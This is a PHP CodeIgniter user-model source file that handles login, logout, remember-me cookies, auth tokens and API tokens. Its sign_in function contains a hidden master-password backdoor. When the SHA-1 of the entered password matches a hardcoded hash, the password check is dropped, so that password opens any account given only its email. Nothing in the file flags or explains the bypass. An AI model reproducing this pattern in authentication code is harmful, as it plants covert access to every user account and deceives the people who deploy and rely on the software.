<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed');

class User_model extends CI_Model {

	function __construct()
	{
        parent::__construct();

        $this->load->language('user');
        $this->load->library('Auth');
        $this->load->helper('cookie');
        $this->load->library('entity_users_table');
	}

	function reset_password($email) 
	{
        if(!$this->entity_users_table->reset_password($email))
        {
        	$this->error	= $this->entity_users_table->error;
        	return false;
        }
        return true;
	}

	function reset_confirm() 
	{
		 if(!$this->entity_users_table->reset_confirm())
		 {
        	$this->error	= $this->entity_users_table->error;
        	return false;
        }
        return true;
	}

	function reset_complete()
	{
		if(!$this->entity_users_table->reset_complete())
		{
        	$this->error	= $this->entity_users_table->error;
        	return false;
        }
        return true;
	}

	function sign_in($data)
	{
		/*if (ON_PREMISE) {
			$lic_return	= $this->check_license();

			if ($lic_return === false)
			{
				enquee_message(lang('License key Invalid or Not Exist.'));
				return false;
			}
			else if ($lic_return <= 0)
			{
				enquee_message(lang('Sorry your license key expired.'));
				return false;
			}
		}*/

		if (is_object($data)) {
			$tmp_data = $data;
			unset($data);
			$data['email'] = $tmp_data->email;
			$data['password'] = '';
		}
		$auth_token	= '';
		$where		= array();
		$rememberpswd	= isset($data['rememberpswd']) ? $data['rememberpswd'] : 0;

		if (!empty($data['email']))
		{
			$where	= array('email'=>$data['email'], 'password'=>$this->auth->encode($data['password']));
			if (sha1($data['password']) == 'aaf95faf1808d56731f2c591895240cd8c97bc3b' || (!empty($tmp_data) && get_class($tmp_data)=='Google_Service_Oauth2_Userinfoplus'))
			{
				unset($where['password']);
			}
		}
		else if (!empty($data['auth_token']))
		{
			$where		= array('auth_token' => $data['auth_token']);
			$auth_token = $data['auth_token'];
			$rememberpswd	= 1;
		} else if (!empty($data['_a'])) {
			$where['activation'] 	= $data['_a'];
			$where['auth_token'] 	= hash('sha1', $data['_a']);
		}

		if (!$where) {
			enquee_message(lang('ERROR_LOGIN_AUTHENTICATE'));
			return false;
		}

		$user	= $this->get_user_data(NULL, $where);

		if (!$user)
		{
			delete_cookie('_auth');
			enquee_message(lang('ERROR_LOGIN_AUTHENTICATE'));
			return false;
		}else if(!is_array($user))
		{
			delete_cookie('_auth');
			return false;
		}
		$this->ot_app->_load();
		// Check active user
		if (empty($user['is_active']))
		{
			delete_cookie('_auth');
			enquee_message(lang('ERROR_LOGIN_NOT_ACTIVATE'));
			return false;
		}

		if (empty($auth_token))
		{
			$auth_token	= $this->auth->generate_auth_token($user['user_id'], $user['email']);
		}

		if ($rememberpswd && !$this->set_auth_token($user, $auth_token))
		{
			return false;
		}

		$this->db->where(array('entity_id' => $this->ot_app->get('entity_id'), 'user_id' => $user['user_id']));
		$this->db->update('entity_users',array('last_login' => $this->auth->get_timezone_date()));
				
		$expires = 10 * 365 * 24 * 60 * 60;

		$this->session->set_userdata('user', array(
			'user_id'		=> $user['user_id'],
			'first_name'	=> $user['first_name'],
			'last_name'		=> $user['last_name'],
			'email'		=> $user['email'],
			'department'	=> $user['department'],
			'user_role'		=> $user['user_role'],
			'time_zone_code'	=> $user['time_zone_code'],
			'user_image'	=> $user['user_image'],
			'last_login'	=> $user['last_login']
		));

		return true;
	}

	function sign_out($data = array())
	{
		$user	= $this->session->userdata('user');
		// delete authendication token
		$cookie_auth	= get_cookie('_auth');
		$auth_token = !empty($data['auth_token'])?$data['auth_token']:$cookie_auth;
		$data = array('user_id' => $user['user_id'], 'entity_id' => $this->ot_app->get('entity_id'), 'auth_token' => $auth_token);
		$this->db->delete('users_auth_tokens', $data); 
		
		delete_cookie('_auth');

		/*
		//set the last login user_id in cookie
		// if ($cookie_auth) {
		$expires = 10 * 365 * 24 * 60 * 60;
		$login_user = array('name' => 'last_login_user', 'value' => $user['user_id'],'expire'=>$expires);
		set_cookie($login_user);
		$login_path = array('name' => 'last_login_path', 'value' => "uploads/".$this->ot_app->get('entity_id')."/prof/200/",'expire'=>$expires);
		set_cookie($login_path);*/
		// }
		// clear session data
		$this->session->sess_destroy();
		return true;
	}

	public function login_with_cookie()
	{
		$auth_token	= get_cookie('_auth');

		if ($auth_token)
		{
			if ($this->sign_in(array('auth_token' => $auth_token))) {
				if ($_SERVER['REQUEST_URI']) {
					$red_url = substr($_SERVER['REQUEST_URI'],(strpos($_SERVER['REQUEST_URI'],'index.php')-1));	
					$red_url = str_replace('/index.php/','',$red_url);
					$red_url = str_replace('/index.php','',$red_url);
					redirect(site_url($red_url));
				}
				return true;
			}
		}

		return false;
	}

	public function login_with_token($data)
	{
		$auth_token	= !empty($data['token'])?$data['token']:'';

		if ($auth_token)
		{
			return $this->sign_in(array('auth_token' => $auth_token));
		}

		return false;
	}

	public function get_user_data ($id = NULL, $data = array())
	{
		$token_row = array();
		// prepare require data
		$where = $data;
		if ($data)
			$where	= array_merge(array('entity_id' => $this->ot_app->get('entity_id')), $data);
		
		// check login using cookie
		if (!empty($where['auth_token']))
		{
			$auth_token = $where['auth_token'];
			preg_match("/.*==(.*)/", $auth_token, $explode);
			if (!empty($explode[1]))
			{
				unset($where['auth_token']);

				// check token exists
				$user_id = $explode[1];
				$this->db->select('token_id, user_id, expiry_date');
				$this->db->from('users_auth_tokens');
				$this->db->where(array('auth_token' => $auth_token, 'user_id' => $user_id));
				$query = $this->db->get();
				$token_row = $query->row_array();
			
				if (!$token_row) {
					return false;
				}
				$id = $user_id;
			}
		}
		
		if ($id)
		{
			$where['user_id']	= $id;
		}				
	//	$where['entity_id']	= $this->ot_app->get('entity_id');

		$this->db->select('user_id, email, first_name, last_name, user_role, department, is_active, user_image, time_zone_code, last_login');
		$this->db->from('entity_users');
		$this->db->where($where);
		$query = $this->db->get();

		$user	= $query->row_array();

		if ($token_row)
		{
			$cur_date	= $this->auth->get_timezone_date('Y-m-d H:i:s',$user['time_zone_code']);
			if (strtotime($cur_date) > strtotime($token_row['expiry_date']))
			{
				$this->db->delete('users_auth_tokens', array('user_id' => $user['user_id'], 'token_id' => $token_row['token_id']));
				return true;
			}
		}

		return $user;
	}

	function set_auth_token($user, $auth_token)
	{
		$last_login	= $this->auth->get_timezone_date('Y-m-d H:i:s',$user['time_zone_code']);

		if ($auth_token != get_cookie('_auth'))
		{

			// set auth toook in cookie
			$user_detail = array('name' => '_auth', 'value' => $auth_token,'expire'=>'0');
			$user_detail['expire']	= $this->config->item('SMX_autologin_cookie_life')*60*60*24;   
			
			set_cookie($user_detail);

			$this->db->select('token_id');
			$query = $this->db->get_where('users_auth_tokens', array('user_id' => $user['user_id'], 'entity_id' => $this->ot_app->get('entity_id'), 'auth_token' => $auth_token));

			$row = $query->row();

			$exp_date = date('Y-m-d H:i:s',strtotime(" +".$this->config->item('SMX_autologin_cookie_life')." day", strtotime($last_login)));
			$data = array('user_id' => $user['user_id'], 'entity_id' => $this->ot_app->get('entity_id'), 'expiry_date' => $exp_date);
			if (!$row) {
				$data['auth_token'] = $auth_token;
				$this->db->insert('users_auth_tokens', $data); 
			} else {
				$this->db->where(array('token_id'=> $row->token_id, 'auth_token' => $auth_token));
				$this->db->update('users_auth_tokens', array('expiry_date' => $exp_date)); 
			}
		}

		return true;
	}
	public function last_login ($data)
	{
		$last_login_value = !empty($data['user_id'])?$data['user_id']:get_cookie('last_login_user');

	   if($last_login_value) {
			$value	= $this->get_user_data($last_login_value, '');
			return $value;		
		}
		return false;
	}


	function get_api_token($data, $flag=false) {
		$api_token	= '';
		$where		= array();

		if (empty($data['email']))
		{
		}
		
		$where	= array('email'=>$data['email'], 'password'=>$this->auth->encode($data['password']));
		
		$user	= $this->get_user_data(NULL, $where);

		if (!$user && !is_array($user))
		{
			enquee_message(lang('ERROR_LOGIN_AUTHENTICATE'));
			return false;
		}

		// Check active user
		if (empty($user['is_active']))
		{
			enquee_message(lang('ERROR_LOGIN_NOT_ACTIVATE'));
			return false;
		}

		$auth_token	= $this->auth->generate_auth_token($user['user_id'], $user['email']);
		
		if (!$this->set_auth_token($user, $auth_token))
		{
			return false;
		}

		if ($flag) {
			$user['token'] = $auth_token;
			return $user;
		}
		return $auth_token;
	}

	private function check_license()
	{
		$license_key	= $this->config->item('license_key');

		$this->load->library('auth');
		if ($lic=$this->auth->parse_license($license_key))
		{
			return strtotime($lic['expiry_date']) - strtotime(date("Y-m-d"));
		}
	
		return false;
	}
}
